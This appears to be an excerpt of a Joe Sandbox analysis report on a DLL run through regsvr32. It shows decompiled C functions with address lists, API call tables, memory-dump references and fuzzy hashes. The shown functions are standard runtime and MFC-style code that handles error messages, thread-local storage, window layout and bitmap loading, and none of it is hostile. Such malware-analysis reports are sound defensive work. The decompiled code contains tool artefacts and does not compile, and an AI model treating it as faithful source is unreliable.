                                                                        0x10016a96
                                                                        0x10016aa1
                                                                        0x10016aa6
                                                                        0x10016aad
                                                                        0x10016ab2
                                                                        0x10016ab7
                                                                        0x10016abc
                                                                        0x10016abd
                                                                        0x10016ac2
                                                                        0x100169ff
                                                                        0x100169e2
                                                                        0x10016b0a

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
                                                                        • _strlen.LIBCMT ref: 10016A35
                                                                        • _strlen.LIBCMT ref: 10016A44
                                                                        • _strncpy.LIBCMT ref: 10016A5B
                                                                        • _strlen.LIBCMT ref: 10016A64
                                                                        • _strlen.LIBCMT ref: 10016A71
                                                                        • _strlen.LIBCMT ref: 10016AD7
                                                                        • GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
                                                                        • WriteFile.KERNEL32(00000000), ref: 10016AE9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$File$HandleModuleNameWrite_strncpy
                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                        • API String ID: 190417973-4022980321
                                                                        • Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                        • Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
                                                                        • Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                        • Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10015384 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71libraryloadermemoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E10015384() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E100138E5() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x1004f5e0;
						 *0x1004f5e8 = _t16;
						if( *0x1004f5e0 == 0) {
							 *0x1004f5e0 = TlsGetValue;
							 *0x1004f5e4 = TlsSetValue;
							 *0x1004f5dc = 0x10015164;
							 *0x1004f5e8 = TlsFree;
						}
					}
					_t7 =  *0x1004f5dc(E1001520E);
					__eflags = _t7 - 0xffffffff;
					 *0x1004c848 = _t7;
					if(__eflags == 0) {
						L9:
						E1001516D();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E1001382A(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E1001516D();
					return 0;
				}
			}














                                                                        0x1001538b
                                                                        0x10015395
                                                                        0x100153a2
                                                                        0x100153a4
                                                                        0x100153a6
                                                                        0x100153a8
                                                                        0x100153bc
                                                                        0x100153c9
                                                                        0x100153d6
                                                                        0x100153db
                                                                        0x100153dd
                                                                        0x100153e4
                                                                        0x100153e9
                                                                        0x100153f0
                                                                        0x100153fa
                                                                        0x10015404
                                                                        0x1001540e
                                                                        0x1001540e
                                                                        0x100153e9
                                                                        0x10015418
                                                                        0x1001541e
                                                                        0x10015421
                                                                        0x10015426
                                                                        0x10015469
                                                                        0x10015469
                                                                        0x1001546e
                                                                        0x1001546e
                                                                        0x10015428
                                                                        0x1001542a
                                                                        0x10015430
                                                                        0x10015436
                                                                        0x10015438
                                                                        0x1001543c
                                                                        0x00000000
                                                                        0x1001543e
                                                                        0x10015445
                                                                        0x1001544b
                                                                        0x1001544d
                                                                        0x00000000
                                                                        0x1001544f
                                                                        0x1001544f
                                                                        0x10015456
                                                                        0x10015459
                                                                        0x1001545f
                                                                        0x10015463
                                                                        0x10015465
                                                                        0x10015465
                                                                        0x1001544d
                                                                        0x1001543c
                                                                        0x10015472
                                                                        0x1001538d
                                                                        0x1001538d
                                                                        0x10015394
                                                                        0x10015394

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
                                                                        • FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
                                                                        • FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10015459
                                                                          • Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                        • API String ID: 2355849793-282957996
                                                                        • Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                        • Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
                                                                        • Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                        • Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002D2D6 Relevance: 21.4, APIs: 14, Instructions: 397COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				void* _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				struct tagRECT _v100;
				struct HDWP__* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t188;
				signed int _t190;
				signed int _t192;
				intOrPtr* _t198;
				intOrPtr _t206;
				int _t208;
				signed int _t210;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				signed int _t221;
				void* _t225;
				intOrPtr _t233;
				intOrPtr _t234;
				int _t243;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t273;
				signed int _t280;
				signed int _t287;
				intOrPtr* _t297;
				intOrPtr _t302;
				signed int _t310;
				signed int _t312;
				intOrPtr _t319;
				signed int _t325;
				intOrPtr _t326;
				signed int _t329;
				int _t334;
				intOrPtr* _t341;

				_t297 = __ecx;
				E1002F49A( &_v28, _a8, _a12);
				if(IsRectEmpty(_t297 + 0xac) != 0) {
					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
					_t188 = _v84.right - _v84.left;
					_t302 = _v84.bottom - _v84.top;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
					_t188 = _v68.right - _v68.left;
					_t302 = _v68.bottom - _v68.top;
				}
				_t334 = 0;
				_v44 = _t188;
				_v40 = _t302;
				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
				} else {
					_v132 = 0;
				}
				_t190 =  *0x1004efa0; // 0x2
				_v36 =  ~_t190;
				_t192 =  *0x1004efa4; // 0x2
				_v32 =  ~_t192;
				_v16 = _t334;
				_v12 = _t334;
				_v8 = _t334;
				if( *(_t297 + 0x9c) <= _t334) {
					L72:
					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
						EndDeferWindowPos(_v132);
					}
					SetRectEmpty( &_v100);
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
					if(_a8 == _t334 || _a12 == _t334) {
						if(_v28 != _t334) {
							_v28 = _v28 + _v100.left - _v100.right;
						}
					}
					if(_a8 == _t334 || _a12 != _t334) {
						if(_v24 != _t334) {
							_v24 = _v24 + _v100.top - _v100.bottom;
						}
					}
					_t198 = _a4;
					 *_t198 = _v28;
					 *((intOrPtr*)(_t198 + 4)) = _v24;
					return _t198;
				} else {
					do {
						_t341 = E1002CE0B(_t297, _v8);
						_v20 = _t341;
						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
						if(_t341 == _t334) {
							if(_t206 != _t334) {
								goto L71;
							}
							L58:
							_t208 = _v16;
							if(_t208 != _t334) {
								if(_a12 == _t334) {
									_t310 = _v36 + _t208 -  *0x1004efa0;
									_v36 = _t310;
									if(_v28 <= _t310) {
										_v28 = _t310;
									}
									_t210 = _v32;
									if(_v24 <= _t210) {
										_v24 = _t210;
									}
									_t211 =  *0x1004efa4; // 0x2
									_v32 =  ~_t211;
								} else {
									_t312 = _v32 + _t208 -  *0x1004efa4;
									_t214 = _v36;
									_v32 = _t312;
									if(_v28 <= _t214) {
										_v28 = _t214;
									}
									if(_v24 <= _t312) {
										_v24 = _t312;
									}
									_t215 =  *0x1004efa0; // 0x2
									_v36 =  ~_t215;
								}
								_v16 = _t334;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
							L51:
							if(_v12 != _t334) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
							goto L71;
						}
						_t221 =  *(_t341 + 0x7c);
						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
						} else {
							_t225 = 6;
						}
						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
						E100086B2( &_v68, _v36, _v32, _v52, _v48);
						GetWindowRect( *(_t341 + 0x1c),  &_v84);
						E10028E5A(_t297,  &_v84);
						if(_a12 == _t334) {
							_t233 = _v84.top;
							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t334, _t233 - _v68.top);
							}
							_t234 = _v68.bottom;
							_t319 = _v40;
							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
								_t256 = _v32;
								if(_t325 > _t256) {
									_t256 = _t325;
								}
								OffsetRect( &_v68, _t334, _t256 - _v68.top);
							}
							if(_v12 == _t334) {
								if(_v68.top < _v40 -  *0x1004efa4) {
									goto L44;
								}
								_t247 = _v8;
								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x1004efa4; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
								L44:
								if(EqualRect( &_v68,  &_v84) == 0) {
									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t341 = _v20;
										_t334 = 0;
									}
									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
								}
								_v32 = _v68.top -  *0x1004efa4 + _v48;
								_t243 = _v52;
								if(_v16 > _t243) {
									goto L52;
								} else {
									_v16 = _t243;
									goto L51;
								}
							}
						} else {
							_t263 = _v84.left;
							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t263 - _v68.left, _t334);
							}
							_t264 = _v68.right;
							_t326 = _v44;
							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
								L22:
								if(_v12 == _t334) {
									if(_v68.left < _v44 -  *0x1004efa0) {
										L27:
										if(EqualRect( &_v68,  &_v84) == 0) {
											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t341 = _v20;
												_t334 = 0;
											}
											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
										}
										_v36 = _v52 -  *0x1004efa0 + _v68.left;
										_t273 = _v48;
										if(_v16 <= _t273) {
											_v16 = _t273;
										}
										goto L52;
									}
									_t277 = _v8;
									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
										goto L27;
									} else {
										L56:
										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
										_v12 = 1;
										goto L58;
									}
								}
								_t280 =  *0x1004efa0; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
								goto L27;
							} else {
								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
								_t287 = _v36;
								if(_t329 > _t287) {
									_t287 = _t329;
								}
								OffsetRect( &_v68, _t287 - _v68.left, _t334);
								goto L22;
							}
						}
						L71:
						_v8 = _v8 + 1;
					} while (_v8 <  *(_t297 + 0x9c));
					goto L72;
				}
			}























































                                                                        0x1002d2eb
                                                                        0x1002d2ee
                                                                        0x1002d302
                                                                        0x1002d338
                                                                        0x1002d344
                                                                        0x1002d347
                                                                        0x1002d304
                                                                        0x1002d30c
                                                                        0x1002d30d
                                                                        0x1002d30e
                                                                        0x1002d315
                                                                        0x1002d316
                                                                        0x1002d322
                                                                        0x1002d325
                                                                        0x1002d325
                                                                        0x1002d34a
                                                                        0x1002d352
                                                                        0x1002d355
                                                                        0x1002d358
                                                                        0x1002d36b
                                                                        0x1002d35a
                                                                        0x1002d35a
                                                                        0x1002d35a
                                                                        0x1002d36e
                                                                        0x1002d375
                                                                        0x1002d378
                                                                        0x1002d385
                                                                        0x1002d388
                                                                        0x1002d38b
                                                                        0x1002d38e
                                                                        0x1002d391
                                                                        0x1002d6fd
                                                                        0x1002d703
                                                                        0x1002d70d
                                                                        0x1002d70d
                                                                        0x1002d717
                                                                        0x1002d728
                                                                        0x1002d731
                                                                        0x1002d73b
                                                                        0x1002d743
                                                                        0x1002d743
                                                                        0x1002d73b
                                                                        0x1002d749
                                                                        0x1002d753
                                                                        0x1002d75b
                                                                        0x1002d75b
                                                                        0x1002d753
                                                                        0x1002d75e
                                                                        0x1002d765
                                                                        0x1002d76b
                                                                        0x1002d770
                                                                        0x1002d397
                                                                        0x1002d397
                                                                        0x1002d3a4
                                                                        0x1002d3ac
                                                                        0x1002d3b6
                                                                        0x1002d3b8
                                                                        0x1002d682
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d684
                                                                        0x1002d684
                                                                        0x1002d689
                                                                        0x1002d68e
                                                                        0x1002d6c6
                                                                        0x1002d6cb
                                                                        0x1002d6ce
                                                                        0x1002d6d0
                                                                        0x1002d6d0
                                                                        0x1002d6d3
                                                                        0x1002d6d9
                                                                        0x1002d6db
                                                                        0x1002d6db
                                                                        0x1002d6de
                                                                        0x1002d6e5
                                                                        0x1002d690
                                                                        0x1002d699
                                                                        0x1002d69b
                                                                        0x1002d6a1
                                                                        0x1002d6a4
                                                                        0x1002d6a6
                                                                        0x1002d6a6
                                                                        0x1002d6ac
                                                                        0x1002d6ae
                                                                        0x1002d6ae
                                                                        0x1002d6b1
                                                                        0x1002d6b8
                                                                        0x1002d6b8
                                                                        0x1002d6e8
                                                                        0x1002d6e8
                                                                        0x00000000
                                                                        0x1002d689
                                                                        0x1002d3ca
                                                                        0x1002d61a
                                                                        0x1002d61d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d623
                                                                        0x1002d62b
                                                                        0x00000000
                                                                        0x1002d62b
                                                                        0x1002d3d0
                                                                        0x1002d3d5
                                                                        0x1002d3e7
                                                                        0x1002d3ec
                                                                        0x1002d3db
                                                                        0x1002d3dd
                                                                        0x1002d3dd
                                                                        0x1002d3fa
                                                                        0x1002d40f
                                                                        0x1002d41b
                                                                        0x1002d427
                                                                        0x1002d42f
                                                                        0x1002d540
                                                                        0x1002d546
                                                                        0x1002d559
                                                                        0x1002d559
                                                                        0x1002d55f
                                                                        0x1002d562
                                                                        0x1002d567
                                                                        0x1002d57a
                                                                        0x1002d57c
                                                                        0x1002d581
                                                                        0x1002d583
                                                                        0x1002d583
                                                                        0x1002d58e
                                                                        0x1002d58e
                                                                        0x1002d597
                                                                        0x1002d642
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d648
                                                                        0x1002d64d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d59d
                                                                        0x1002d59d
                                                                        0x1002d5af
                                                                        0x1002d5b2
                                                                        0x1002d5b8
                                                                        0x1002d5c8
                                                                        0x1002d5d0
                                                                        0x1002d5e7
                                                                        0x1002d5e8
                                                                        0x1002d5e9
                                                                        0x1002d5ea
                                                                        0x1002d5eb
                                                                        0x1002d5ee
                                                                        0x1002d5ee
                                                                        0x1002d5fb
                                                                        0x1002d5fb
                                                                        0x1002d60c
                                                                        0x1002d60f
                                                                        0x1002d615
                                                                        0x00000000
                                                                        0x1002d617
                                                                        0x1002d617
                                                                        0x00000000
                                                                        0x1002d617
                                                                        0x1002d615
                                                                        0x1002d435
                                                                        0x1002d435
                                                                        0x1002d43b
                                                                        0x1002d44e
                                                                        0x1002d44e
                                                                        0x1002d454
                                                                        0x1002d457
                                                                        0x1002d45c
                                                                        0x1002d489
                                                                        0x1002d48c
                                                                        0x1002d4b7
                                                                        0x1002d4d5
                                                                        0x1002d4e5
                                                                        0x1002d4ed
                                                                        0x1002d504
                                                                        0x1002d505
                                                                        0x1002d506
                                                                        0x1002d507
                                                                        0x1002d508
                                                                        0x1002d50b
                                                                        0x1002d50b
                                                                        0x1002d518
                                                                        0x1002d518
                                                                        0x1002d529
                                                                        0x1002d52c
                                                                        0x1002d532
                                                                        0x1002d538
                                                                        0x1002d538
                                                                        0x00000000
                                                                        0x1002d532
                                                                        0x1002d4b9
                                                                        0x1002d4be
                                                                        0x00000000
                                                                        0x1002d668
                                                                        0x1002d668
                                                                        0x1002d676
                                                                        0x1002d67b
                                                                        0x00000000
                                                                        0x1002d67b
                                                                        0x1002d4be
                                                                        0x1002d48e
                                                                        0x1002d4a0
                                                                        0x1002d4a3
                                                                        0x00000000
                                                                        0x1002d466
                                                                        0x1002d46f
                                                                        0x1002d471
                                                                        0x1002d476
                                                                        0x1002d478
                                                                        0x1002d478
                                                                        0x1002d483
                                                                        0x00000000
                                                                        0x1002d483
                                                                        0x1002d45c
                                                                        0x1002d6eb
                                                                        0x1002d6eb
                                                                        0x1002d6f1
                                                                        0x00000000
                                                                        0x1002d397

                                                                        APIs
                                                                        • IsRectEmpty.USER32 ref: 1002D2FA
                                                                        • GetClientRect.USER32 ref: 1002D338
                                                                        • BeginDeferWindowPos.USER32(?), ref: 1002D365
                                                                        • GetWindowRect.USER32 ref: 1002D41B
                                                                        • OffsetRect.USER32(?,?,00000000), ref: 1002D44E
                                                                        • OffsetRect.USER32(?,?,00000000), ref: 1002D483
                                                                        • OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
                                                                        • EqualRect.USER32 ref: 1002D4DD
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D559
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D58E
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
                                                                        • EqualRect.USER32 ref: 1002D5C0
                                                                        • EndDeferWindowPos.USER32(?), ref: 1002D70D
                                                                        • SetRectEmpty.USER32(?), ref: 1002D717
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                                                        • String ID:
                                                                        • API String ID: 3160784657-0
                                                                        • Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                        • Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
                                                                        • Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                        • Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B597 Relevance: 21.1, APIs: 14, Instructions: 136windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t54;
				signed int _t56;
				struct HDC__* _t65;
				struct HBITMAP__* _t66;
				struct HDC__* _t70;
				void* _t78;
				int* _t80;
				int _t81;
				signed int _t84;
				signed int _t89;
				void* _t102;
				struct HDC__* _t103;
				BITMAPINFO* _t105;

				_t53 = LoadResource(_a4, _a8);
				_v20 = _t53;
				if(_t53 == 0) {
					return _t53;
				}
				_t54 = LockResource(_t53);
				_t78 = _t54;
				_v12 = _t78;
				if(_t78 == 0) {
					L17:
					return _t54;
				}
				_t99 =  *_t78 + 0x40;
				_t54 = E100107B6( *_t78 + 0x40);
				_t105 = _t54;
				if(_t105 == 0) {
					L16:
					goto L17;
				} else {
					E10011440(_t105, _t78, _t99);
					_t102 = _t105 + _t105->bmiHeader;
					_a8 = _a8 & 0x00000000;
					do {
						_t84 =  *(_t102 + _a8 * 4);
						_t56 = 0;
						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
							_t56 = _t56 + 1;
							if(_t56 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t80 = 0x1003f064 + _t56 * 8;
							_v8 = _t80;
							_a4 = GetSysColor( *_t80) & 0x000000ff;
							_a4 = GetSysColor( *_t80) << 8;
							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
							__eflags = _t89;
							 *(_t102 + _a8 * 4) = _t89;
						} else {
							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
							if(__eflags != 0) {
								 *(_t102 + _a8 * 4) = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t103 = _t105->bmiHeader.biWidth;
					_t81 = _t105->bmiHeader.biHeight;
					_a4 = _t103;
					_a8 = _t81;
					_t65 = GetDC(0);
					_a12 = _t65;
					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
					_v8 = _t66;
					if(_t66 != 0) {
						_t70 = CreateCompatibleDC(_a12);
						_t81 = SelectObject;
						_t103 = _t70;
						_v16 = SelectObject(_t103, _v8);
						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
						SelectObject(_t103, _v16);
						DeleteDC(_t103);
					}
					ReleaseDC(0, _a12);
					_push(_t105);
					E100107C8(_t81, _t103, _t105, 0);
					FreeResource(_v20);
					_t54 = _v8;
					goto L16;
				}
			}

























                                                                        0x1002b5a3
                                                                        0x1002b5ab
                                                                        0x1002b5ae
                                                                        0x1002b71c
                                                                        0x1002b71c
                                                                        0x1002b5b6
                                                                        0x1002b5bc
                                                                        0x1002b5c0
                                                                        0x1002b5c3
                                                                        0x1002b71a
                                                                        0x00000000
                                                                        0x1002b71a
                                                                        0x1002b5cd
                                                                        0x1002b5d1
                                                                        0x1002b5d6
                                                                        0x1002b5db
                                                                        0x1002b718
                                                                        0x00000000
                                                                        0x1002b5e1
                                                                        0x1002b5e4
                                                                        0x1002b5ee
                                                                        0x1002b5f0
                                                                        0x1002b5f4
                                                                        0x1002b5f7
                                                                        0x1002b5fa
                                                                        0x1002b5fc
                                                                        0x1002b605
                                                                        0x1002b609
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b60b
                                                                        0x1002b60d
                                                                        0x1002b611
                                                                        0x1002b629
                                                                        0x1002b632
                                                                        0x1002b640
                                                                        0x1002b655
                                                                        0x1002b667
                                                                        0x1002b667
                                                                        0x1002b66c
                                                                        0x1002b613
                                                                        0x1002b613
                                                                        0x1002b61b
                                                                        0x1002b620
                                                                        0x1002b620
                                                                        0x1002b61b
                                                                        0x1002b66f
                                                                        0x1002b66f
                                                                        0x1002b672
                                                                        0x1002b67c
                                                                        0x1002b67f
                                                                        0x1002b684
                                                                        0x1002b687
                                                                        0x1002b68a
                                                                        0x1002b693
                                                                        0x1002b696
                                                                        0x1002b69e
                                                                        0x1002b6a1
                                                                        0x1002b6a6
                                                                        0x1002b6af
                                                                        0x1002b6b5
                                                                        0x1002b6ca
                                                                        0x1002b6e7
                                                                        0x1002b6f1
                                                                        0x1002b6f4
                                                                        0x1002b6f4
                                                                        0x1002b6ff
                                                                        0x1002b705
                                                                        0x1002b706
                                                                        0x1002b70f
                                                                        0x1002b715
                                                                        0x00000000
                                                                        0x1002b715

                                                                        APIs
                                                                        • LoadResource.KERNEL32(?,?), ref: 1002B5A3
                                                                        • LockResource.KERNEL32(00000000), ref: 1002B5B6
                                                                        • GetSysColor.USER32(00000000), ref: 1002B635
                                                                        • GetSysColor.USER32(00000000), ref: 1002B643
                                                                        • GetSysColor.USER32(00000000), ref: 1002B658
                                                                        • GetDC.USER32(00000000), ref: 1002B68A
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
                                                                        • SelectObject.GDI32(00000000,?), ref: 1002B6B8
